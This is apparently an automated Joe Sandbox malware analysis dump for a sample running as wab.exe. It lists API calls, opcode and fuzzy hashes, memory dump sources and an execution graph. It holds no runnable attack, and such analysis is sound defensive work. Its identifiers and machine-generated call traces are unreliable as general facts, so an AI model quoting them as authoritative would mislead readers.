                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,20A04AEA,?,?,20A04A8A,?,20A12238,0000000C,20A04BBD,00000000,00000000), ref: 20A04B59
                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 20A04B6C
                                                            • FreeLibrary.KERNEL32(00000000,?,?,?,20A04AEA,?,?,20A04A8A,?,20A12238,0000000C,20A04BBD,00000000,00000000,00000001,20A02082), ref: 20A04B8F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                            • String ID: CorExitProcess$mscoree.dll
                                                            • API String ID: 4061214504-1276376045
                                                            • Opcode ID: 444f823ab93311fdb1af76e20d659acb8835c13e6e083463892996e83965c381
                                                            • Instruction ID: fa1c07e4e8770b9b10b6e8ef1047ba104ca69916e3df89e67318c8c8d824bfb2
                                                            • Opcode Fuzzy Hash: 444f823ab93311fdb1af76e20d659acb8835c13e6e083463892996e83965c381
                                                            • Instruction Fuzzy Hash: F9F0A43290450CBBCB119FD0DC18FADBFBAFF05351F804158F90AA6150DB358D42DA90
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetEnvironmentStringsW.KERNEL32 ref: 20A0715C
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 20A0717F
                                                              • Part of subcall function 20A056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20A05702
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 20A071A5
                                                            • _free.LIBCMT ref: 20A071B8
                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 20A071C7
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                            • String ID:
                                                            • API String ID: 336800556-0
                                                            • Opcode ID: ea43f736f97a6ceab05a0a41a9c452803db0c83e059a04e25588329fb3f167ee
                                                            • Instruction ID: fa1fe883311c83a2b64b08b75733cb7ea859817b1fbab02a05dc85b8fc8b079a
                                                            • Opcode Fuzzy Hash: ea43f736f97a6ceab05a0a41a9c452803db0c83e059a04e25588329fb3f167ee
                                                            • Instruction Fuzzy Hash: A2018873E0561DBB23114AF66C4CF7F6A6FEBC69607900269BD08C7294EA758C0391B4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00000000,20A0636D,20A05713,00000000,?,20A02249,?,?,20A01D66,00000000,?,?,00000000), ref: 20A05B7F
                                                            • _free.LIBCMT ref: 20A05BB4
                                                            • _free.LIBCMT ref: 20A05BDB
                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A05BE8
                                                            • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 20A05BF1
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast$_free
                                                            • String ID:
                                                            • API String ID: 3170660625-0
                                                            • Opcode ID: ed3ecca02132af2788482e4fb08cddcdd8cb8b19f97e0c13a03e62bf0f941a64
                                                            • Instruction ID: 877bdf211eebd71b0a5b738dad6d7b43981540725f5640466c76a497a2407144
                                                            • Opcode Fuzzy Hash: ed3ecca02132af2788482e4fb08cddcdd8cb8b19f97e0c13a03e62bf0f941a64
                                                            • Instruction Fuzzy Hash: A9014933608A0CB792025BF87DC5F1B3A6FABC35707E00014F80AE2152FE689D031124
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • lstrlenW.KERNEL32(?,?,?,?,?,20A010DF,?,?,?,00000000), ref: 20A01E9A
                                                            • lstrcatW.KERNEL32(?,?), ref: 20A01EAC
                                                            • lstrlenW.KERNEL32(?,?,20A010DF,?,?,?,00000000), ref: 20A01EB3
                                                            • lstrlenW.KERNEL32(?,?,20A010DF,?,?,?,00000000), ref: 20A01EC8
                                                            • lstrcatW.KERNEL32(?,20A010DF), ref: 20A01ED3
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: lstrlen$lstrcat
                                                            • String ID:
                                                            • API String ID: 493641738-0
                                                            • Opcode ID: 2dc609aa6270c6d28988b904e2da9b051a46011a21c539b3c3375c326534c6e7
                                                            • Instruction ID: 0c1bf5e9f94b3cb0e31c5816e9bdfa92a547a458d756fc3de9e19c5bc72d9a97
                                                            • Opcode Fuzzy Hash: 2dc609aa6270c6d28988b904e2da9b051a46011a21c539b3c3375c326534c6e7
                                                            • Instruction Fuzzy Hash: 4CF082271046187AE6216BAAEC85FBF7B7DFFC6B60F840019FA0D831909B59584393B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 20A091D0
                                                              • Part of subcall function 20A0571E: HeapFree.KERNEL32(00000000,00000000,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?), ref: 20A05734
                                                              • Part of subcall function 20A0571E: GetLastError.KERNEL32(?,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?,?), ref: 20A05746
                                                            • _free.LIBCMT ref: 20A091E2
                                                            • _free.LIBCMT ref: 20A091F4
                                                            • _free.LIBCMT ref: 20A09206
                                                            • _free.LIBCMT ref: 20A09218
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 4217f81acee830a1e1398cf9b73e7118e2521abffab66b1e3d4c3b3269a945dd
                                                            • Instruction ID: fbb8d110e1975161f00a3a6033b507cd779e1c20d6874b3b8971aec96cf4dc5c
                                                            • Opcode Fuzzy Hash: 4217f81acee830a1e1398cf9b73e7118e2521abffab66b1e3d4c3b3269a945dd
                                                            • Instruction Fuzzy Hash: 0AF03CB2A18648A78A10DBE8FAC5E46BBDEBB243107D04805F909D7540DB24FC809A58
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 20A0536F
                                                              • Part of subcall function 20A0571E: HeapFree.KERNEL32(00000000,00000000,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?), ref: 20A05734
                                                              • Part of subcall function 20A0571E: GetLastError.KERNEL32(?,?,20A0924F,?,00000000,?,00000000,?,20A09276,?,00000007,?,?,20A07E5A,?,?), ref: 20A05746
                                                            • _free.LIBCMT ref: 20A05381
                                                            • _free.LIBCMT ref: 20A05394
                                                            • _free.LIBCMT ref: 20A053A5
                                                            • _free.LIBCMT ref: 20A053B6
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 9dd84df20b5bbd9cd29d7d438d17405efbd3469da13227f82ed2af26e35e5c0f
                                                            • Instruction ID: 976bae7ec496fb543f8b5ac9c2192fe0dcd8f12cabd05c1e1f1d5ddb236f5f1a
                                                            • Opcode Fuzzy Hash: 9dd84df20b5bbd9cd29d7d438d17405efbd3469da13227f82ed2af26e35e5c0f
                                                            • Instruction Fuzzy Hash: A6F06871D18918DB8E01CFF8AFE1715BBB6B7146203C18605FC1447230E7390443BB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • GetModuleFileNameA.KERNEL32(00000000,C:\Program Files (x86)\windows mail\wab.exe,00000104), ref: 20A04C1D
                                                            • _free.LIBCMT ref: 20A04CE8
                                                            • _free.LIBCMT ref: 20A04CF2
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _free$FileModuleName
                                                            • String ID: C:\Program Files (x86)\windows mail\wab.exe
                                                            • API String ID: 2506810119-3377118234
                                                            • Opcode ID: c6b84e05d58e96ff0664713eadcf89ed3af48a385d766cfc21ebead80f307aa6
                                                            • Instruction ID: 075a68a54a1ca1f0c7339117524d462835036146f6cdb28016aa279cbb4ed210
                                                            • Opcode Fuzzy Hash: c6b84e05d58e96ff0664713eadcf89ed3af48a385d766cfc21ebead80f307aa6
                                                            • Instruction Fuzzy Hash: 233170B1A0561CABDB11CFD9A981B9EBBFEFB84314F908056F90497210D6758E42DB50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • MultiByteToWideChar.KERNEL32(00000000,00000000,00000100,00000020,00000000,00000000,5EFC4D8B,00000100,20A06FFD,00000000,00000001,00000020,00000100,?,5EFC4D8B,00000000), ref: 20A08731
                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 20A087BA
                                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 20A087CC
                                                            • __freea.LIBCMT ref: 20A087D5
                                                              • Part of subcall function 20A056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 20A05702
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                            • String ID:
                                                            • API String ID: 2652629310-0
                                                            • Opcode ID: df4ab66c320eb3f0b714fedb5a3befe94df012f1005ef484ca8209e6ee12bb68
                                                            • Instruction ID: 0217788f25749fc54325f050e1d7e67328fc8f70ca1ca6e78b8a3d291b3c2c6f
                                                            • Opcode Fuzzy Hash: df4ab66c320eb3f0b714fedb5a3befe94df012f1005ef484ca8209e6ee12bb68
                                                            • Instruction Fuzzy Hash: F431BC32A0020EABDF158FA4EC85FAF7BA6EB44220FA14168FD4496554EB35CD51CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,20A01D66,00000000,00000000,?,20A05C88,20A01D66,00000000,00000000,00000000,?,20A05E85,?,FlsSetValue), ref: 20A05D13
                                                            • GetLastError.KERNEL32(?,20A05C88,20A01D66,00000000,00000000,00000000,?,20A05E85,?,FlsSetValue,20A0E190,FlsSetValue,00000000,00000364,?,20A05BC8), ref: 20A05D1F
                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,20A05C88,20A01D66,00000000,00000000,00000000,?,20A05E85,?,FlsSetValue,20A0E190,FlsSetValue,00000000), ref: 20A05D2D
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: LibraryLoad$ErrorLast
                                                            • String ID:
                                                            • API String ID: 3177248105-0
                                                            • Opcode ID: c7182d2c8aa975e57fe488436de0df38d194e6e5818de7e9550bd28980c5196a
                                                            • Instruction ID: 1673a0fcf1383dfe0fddf2c0e9352fdafb7172e4e894e1cef08d0e154759eb0f
                                                            • Opcode Fuzzy Hash: c7182d2c8aa975e57fe488436de0df38d194e6e5818de7e9550bd28980c5196a
                                                            • Instruction Fuzzy Hash: 0E01D83760562AABC711CFF8AC5CF47779AAF056A1B900621F90AD7150D729D803CAD0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • _free.LIBCMT ref: 20A0655C
                                                              • Part of subcall function 20A062BC: IsProcessorFeaturePresent.KERNEL32(00000017,20A062AB,00000000,?,?,?,?,00000016,?,?,20A062B8,00000000,00000000,00000000,00000000,00000000), ref: 20A062BE
                                                              • Part of subcall function 20A062BC: GetCurrentProcess.KERNEL32(C0000417), ref: 20A062E0
                                                              • Part of subcall function 20A062BC: TerminateProcess.KERNEL32(00000000), ref: 20A062E7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                            • String ID: *?$.
                                                            • API String ID: 2667617558-3972193922
                                                            • Opcode ID: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                            • Instruction ID: ec611044783f1a0247ef23a9ef7e3d106be25785838c04038b2e93c7ab0f7b18
                                                            • Opcode Fuzzy Hash: 45d8a64586b327f8eab7ad145b3c87db09c0e9126064bd79fff12b51639589bd
                                                            • Instruction Fuzzy Hash: DC519175E0022D9FDB04CFECD981BADBBB6FF58318F648169E454E7301E636AA018B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: _strlen
                                                            • String ID: : $Se.
                                                            • API String ID: 4218353326-4089948878
                                                            • Opcode ID: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                            • Instruction ID: 566763cbe9f5690d2948d9abf8610c9934e2f2bc7e5d7d4f836be5fbc55ad867
                                                            • Opcode Fuzzy Hash: a70abbbd33418fa47f4ed48ac4096c545584c77cf093be3414735b4e2c88b945
                                                            • Instruction Fuzzy Hash: 6211C1B1A00248AFDB11DFE8A841BEEFBFDAF19204F50405AE545E7252E6705A028BA5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 20A02903
                                                              • Part of subcall function 20A035D2: RaiseException.KERNEL32(?,?,?,20A02925,00000000,00000000,00000000,?,?,?,?,?,20A02925,?,20A121B8), ref: 20A03632
                                                            • __CxxThrowException@8.LIBVCRUNTIME ref: 20A02920
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000008.00000002.3762902997.0000000020A01000.00000040.00001000.00020000.00000000.sdmp, Offset: 20A00000, based on PE: true
                                                            • Associated: 00000008.00000002.3762874747.0000000020A00000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                            • Associated: 00000008.00000002.3762902997.0000000020A16000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_8_2_20a00000_wab.jbxd
                                                            Similarity
                                                            • API ID: Exception@8Throw$ExceptionRaise
                                                            • String ID: Unknown exception
                                                            • API String ID: 3476068407-410509341
                                                            • Opcode ID: 969cca7d975eb2ee20641a56d0ad835e319007412aa5b00fa0227ad80a9fcc79
                                                            • Instruction ID: 576c63da1ef25df9dc28350ac3df13c27d68ab7b04ea26638b6410e6d4eb10b9
                                                            • Opcode Fuzzy Hash: 969cca7d975eb2ee20641a56d0ad835e319007412aa5b00fa0227ad80a9fcc79
                                                            • Instruction Fuzzy Hash: 90F0F434A0430C778B00A6E5FD85BB9736FBB14350FD08660FA14A2090EB31EA698780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Execution Graph

                                                            Execution Coverage:6.3%
                                                            Dynamic/Decrypted Code Coverage:9.2%
                                                            Signature Coverage:1.5%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:88
                                                            execution_graph 40351 441a5b 40352 441a66 40351->40352 40355 430937 40352->40355 40356 430956 40355->40356 40357 430977 40355->40357 40356->40357 40359 430969 40356->40359 40363 43097e 40356->40363 40433 42c02e memset 40357->40433 40432 4169a7 11 API calls 40359->40432 40360 430a79 40363->40357 40364 431a7b 40363->40364 40365 431aa3 40364->40365 40421 431b2e 40364->40421 40367 43817e 139 API calls 40365->40367 40365->40421 40370 431ab6 40367->40370 40368 432116 40452 4325ad memset 40368->40452 40375 431b15 40370->40375 40370->40421 40434 43041c 12 API calls 40370->40434 40371 432122 40371->40357 40373 431ad5 40374 431b04 40373->40374 40373->40421 40435 42faf4 12 API calls 40373->40435 40379 42ff8c 139 API calls 40374->40379 40376 431baa 40375->40376 40377 431b7c memcmp 40375->40377 40375->40421 40380 431bb0 40376->40380 40381 431bcb 40376->40381 40377->40376 40396 431b95 40377->40396 40379->40375 40437 4169a7 11 API calls 40380->40437 40384 431bd1 40381->40384 40385 431c45 40381->40385 40386 43034a memcpy 40384->40386 40388 4165ff 11 API calls 40385->40388 40387 431bdc 40386->40387 40387->40421 40438 430468 11 API calls 40387->40438 40390 431c65 40388->40390 40391 431cba 40390->40391 40390->40421 40439 42bf4c 14 API calls 40390->40439 40394 415a91 memset 40391->40394 40393 431bef 40393->40390 40393->40396 40393->40421 40397 431d17 40394->40397 40395 431ca1 40395->40421 40440 42bfcf memcpy 40395->40440 40396->40421 40436 4169a7 11 API calls 40396->40436 40398 431d27 memcpy 40397->40398 40397->40421 40406 431da8 40398->40406 40413 431e97 40398->40413 40400 431eb8 40442 4169a7 11 API calls 40400->40442 40401 431f3c 40403 431fc3 40401->40403 40404 431f45 40401->40404 40445 4397fd memset 40403->40445 40443 4172c8 memset 40404->40443 40406->40400 40408 431e12 memcpy 40406->40408 40406->40413 40406->40421 40441 430af5 16 API calls 40406->40441 40407 431fd4 40407->40421 40446 4328e4 12 API calls 40407->40446 40408->40406 40412 431feb 40447 4233ae 11 API calls 40412->40447 40413->40401 40416 431f6a 40413->40416 40415 431ffc 40417 43202e 40415->40417 40420 4165ff 11 API calls 40415->40420 40416->40421 40444 4169a7 11 API calls 40416->40444 40448 42fe8b 22 API calls 40417->40448 40420->40417 40451 42c02e memset 40421->40451 40422 432057 40422->40421 40449 431917 23 API calls 40422->40449 40424 432079 40450 430b5d 11 API calls 40424->40450 40432->40357 40433->40360 40434->40373 40435->40374 40436->40421 40437->40421 40438->40393 40439->40395 40440->40391 40441->40406 40442->40421 40443->40421 40444->40421 40445->40407 40446->40412 40447->40415 40448->40422 40449->40424 40451->40368 40452->40371 40319 441819 40322 430737 40319->40322 40321 441825 40323 430756 40322->40323 40335 43076d 40322->40335 40324 430774 40323->40324 40325 43075f 40323->40325 40336 43034a 40324->40336 40347 4169a7 11 API calls 40325->40347 40328 4307ce 40329 430819 memset 40328->40329 40340 415b2c 40328->40340 40329->40335 40330 43077e 40330->40328 40333 4307fa 40330->40333 40330->40335 40332 4307e9 40332->40329 40332->40335 40348 4169a7 11 API calls 40333->40348 40335->40321 40337 430359 40336->40337 40338 43034e 40336->40338 40337->40330 40349 415c23 memcpy 40338->40349 40341 415b42 40340->40341 40346 415b46 40340->40346 40342 415b94 40341->40342 40343 415b5a 40341->40343 40341->40346 40344 4438b5 10 API calls 40342->40344 40345 415b79 memcpy 40343->40345 40343->40346 40344->40346 40345->40346 40346->40332 40347->40335 40348->40335 40349->40337 37675 442ec6 19 API calls 37849 4152c6 malloc 37850 4152e2 37849->37850 37851 4152ef 37849->37851 37853 416760 11 API calls 37851->37853 37853->37850 37854 4466f4 37873 446904 37854->37873 37856 446700 GetModuleHandleA 37859 446710 __set_app_type __p__fmode __p__commode 37856->37859 37858 4467a4 37860 4467ac __setusermatherr 37858->37860 37861 4467b8 37858->37861 37859->37858 37860->37861 37874 4468f0 _controlfp 37861->37874 37863 4467bd _initterm __wgetmainargs _initterm 37865 44681e GetStartupInfoW 37863->37865 37866 446810 37863->37866 37867 446866 GetModuleHandleA 37865->37867 37875 41276d 37867->37875 37871 446896 exit 37872 44689d _cexit 37871->37872 37872->37866 37873->37856 37874->37863 37876 41277d 37875->37876 37918 4044a4 LoadLibraryW 37876->37918 37878 412785 37910 412789 37878->37910 37926 414b81 37878->37926 37881 4127c8 37932 412465 memset ??2@YAPAXI 37881->37932 37883 4127ea 37944 40ac21 37883->37944 37888 412813 37962 40dd07 memset 37888->37962 37889 412827 37967 40db69 memset 37889->37967 37892 412822 37988 4125b6 ??3@YAXPAX 37892->37988 37894 40ada2 _wcsicmp 37895 41283d 37894->37895 37895->37892 37898 412863 CoInitialize 37895->37898 37972 41268e 37895->37972 37992 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37898->37992 37902 41296f 37994 40b633 37902->37994 37905 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37909 412957 37905->37909 37915 4128ca 37905->37915 37909->37892 37910->37871 37910->37872 37911 4128d0 TranslateAcceleratorW 37912 412941 GetMessageW 37911->37912 37911->37915 37912->37909 37912->37911 37913 412909 IsDialogMessageW 37913->37912 37913->37915 37914 4128fd IsDialogMessageW 37914->37912 37914->37913 37915->37911 37915->37913 37915->37914 37916 41292b TranslateMessage DispatchMessageW 37915->37916 37917 41291f IsDialogMessageW 37915->37917 37916->37912 37917->37912 37917->37916 37919 4044cf GetProcAddress 37918->37919 37922 4044f7 37918->37922 37920 4044e8 FreeLibrary 37919->37920 37923 4044df 37919->37923 37921 4044f3 37920->37921 37920->37922 37921->37922 37924 404507 MessageBoxW 37922->37924 37925 40451e 37922->37925 37923->37920 37924->37878 37925->37878 37927 414b8a 37926->37927 37928 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37926->37928 37998 40a804 memset 37927->37998 37928->37881 37931 414b9e GetProcAddress 37931->37928 37933 4124e0 37932->37933 37934 412505 ??2@YAPAXI 37933->37934 37935 41251c 37934->37935 37937 412521 37934->37937 38020 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37935->38020 38009 444722 37937->38009 37943 41259b wcscpy 37943->37883 38025 40b1ab ??3@YAXPAX ??3@YAXPAX 37944->38025 37948 40ad4b 37957 40ad76 37948->37957 38049 40a9ce 37948->38049 37949 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37955 40ac5c 37949->37955 37951 40ace7 ??3@YAXPAX 37951->37955 37955->37948 37955->37949 37955->37951 37955->37957 38029 40a8d0 37955->38029 38041 4099f4 37955->38041 37956 40a8d0 7 API calls 37956->37957 38026 40aa04 37957->38026 37958 40ada2 37959 40adc9 37958->37959 37960 40adaa 37958->37960 37959->37888 37959->37889 37960->37959 37961 40adb3 _wcsicmp 37960->37961 37961->37959 37961->37960 38054 40dce0 37962->38054 37964 40dd3a GetModuleHandleW 38059 40dba7 37964->38059 37968 40dce0 3 API calls 37967->37968 37969 40db99 37968->37969 38131 40dae1 37969->38131 38145 402f3a 37972->38145 37974 412766 37974->37892 37974->37898 37975 4126d3 _wcsicmp 37976 4126a8 37975->37976 37976->37974 37976->37975 37978 41270a 37976->37978 38179 4125f8 7 API calls 37976->38179 37978->37974 38148 411ac5 37978->38148 37989 4125da 37988->37989 37990 4125f0 37989->37990 37991 4125e6 DeleteObject 37989->37991 37993 40b1ab ??3@YAXPAX ??3@YAXPAX 37990->37993 37991->37990 37992->37905 37993->37902 37995 40b640 37994->37995 37996 40b639 ??3@YAXPAX 37994->37996 37997 40b1ab ??3@YAXPAX ??3@YAXPAX 37995->37997 37996->37995 37997->37910 37999 40a83b GetSystemDirectoryW 37998->37999 38000 40a84c wcscpy 37998->38000 37999->38000 38005 409719 wcslen 38000->38005 38003 40a881 LoadLibraryW 38004 40a886 38003->38004 38004->37928 38004->37931 38006 409724 38005->38006 38007 409739 wcscat LoadLibraryW 38005->38007 38006->38007 38008 40972c wcscat 38006->38008 38007->38003 38007->38004 38008->38007 38010 444732 38009->38010 38011 444728 DeleteObject 38009->38011 38021 409cc3 38010->38021 38011->38010 38013 412551 38014 4010f9 38013->38014 38015 401130 38014->38015 38016 401134 GetModuleHandleW LoadIconW 38015->38016 38017 401107 wcsncat 38015->38017 38018 40a7be 38016->38018 38017->38015 38019 40a7d2 38018->38019 38019->37943 38019->38019 38020->37937 38024 409bfd memset wcscpy 38021->38024 38023 409cdb CreateFontIndirectW 38023->38013 38024->38023 38025->37955 38027 40aa14 38026->38027 38028 40aa0a ??3@YAXPAX 38026->38028 38027->37958 38028->38027 38030 40a8eb 38029->38030 38031 40a8df wcslen 38029->38031 38032 40a906 ??3@YAXPAX 38030->38032 38033 40a90f 38030->38033 38031->38030 38034 40a919 38032->38034 38035 4099f4 3 API calls 38033->38035 38036 40a932 38034->38036 38037 40a929 ??3@YAXPAX 38034->38037 38035->38034 38039 4099f4 3 API calls 38036->38039 38038 40a93e memcpy 38037->38038 38038->37955 38040 40a93d 38039->38040 38040->38038 38042 409a41 38041->38042 38043 4099fb malloc 38041->38043 38042->37955 38045 409a37 38043->38045 38046 409a1c 38043->38046 38045->37955 38047 409a30 ??3@YAXPAX 38046->38047 38048 409a20 memcpy 38046->38048 38047->38045 38048->38047 38050 40a9e7 38049->38050 38051 40a9dc ??3@YAXPAX 38049->38051 38053 4099f4 3 API calls 38050->38053 38052 40a9f2 38051->38052 38052->37956 38053->38052 38078 409bca GetModuleFileNameW 38054->38078 38056 40dce6 wcsrchr 38057 40dcf5 38056->38057 38058 40dcf9 wcscat 38056->38058 38057->38058 38058->37964 38079 44db70 38059->38079 38063 40dbfd 38082 4447d9 38063->38082 38066 40dc34 wcscpy wcscpy 38108 40d6f5 38066->38108 38067 40dc1f wcscpy 38067->38066 38070 40d6f5 3 API calls 38071 40dc73 38070->38071 38072 40d6f5 3 API calls 38071->38072 38073 40dc89 38072->38073 38074 40d6f5 3 API calls 38073->38074 38075 40dc9c 